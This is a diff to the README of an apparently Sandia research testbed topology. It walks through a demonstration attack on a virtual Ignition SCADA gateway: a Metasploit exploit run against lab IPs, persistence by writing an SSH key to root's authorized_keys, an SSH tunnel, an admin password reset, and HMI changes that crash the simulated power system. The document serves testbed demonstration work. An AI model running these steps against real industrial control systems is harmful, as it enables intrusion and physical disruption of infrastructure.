sandialabs/sceptre-phenix-topologies/soap-hil/README.md

 ### Running an attack scenario in virtual-only mode
 A sample 'attack' is implemented through a few means to demonstrate SCEPTRE without a Hardware-In-The-Loop implementation.
 1. After launching the experiment, enter the `attacker` machine and launch `msfconsole`
    * Start by finding the applicable exploit `search ignition`
    * Select the first exploit `use 3`
-* Set the required options, the RHOSTS, LHOST, and PythonPath `set RHOSTS 10.117.4.70`
+   * Set the required options, the RHOSTS, LHOST, and PythonPath
+       ```bash
+       set RHOSTS 10.117.4.70
-    `set LHOST 10.117.4.169`
+       set LHOST 10.117.4.169
-    `set PythonPath python3`
+       set PythonPath python3
+       ```
    * Run the exploit `exploit`
 2. Add ssh keys to maintain persistence
    * On your host machine `ssh-keygen` to generate a new ssh key
    * In your metasploit session use `echo '[SSH-KEY]' > /root/.ssh/authorized_keys (you may need to create the .ssh directory)
 3. Use port forwarding to get ignition designer
    * Use SSH to open a tunnel to the ignition machine `ssh root@10.117.4.70 -L 9999:localhost:8088`
    * Download the ignition designer from localhost:9999
 4. Use your SSH session to restart the ignition password
    * On the ssh session `gwcmd --passwd` and reset the gateway `gwcmd -r`
    * Refresh your ignition webpage to reset the admin password
 5. Connect to iginition HMI
    * Log in to the Ignition Designer application
    * Open the soap_hil-virt HMI
    * Change random settings on the HMI to crash the Power system

 ### Scorch Test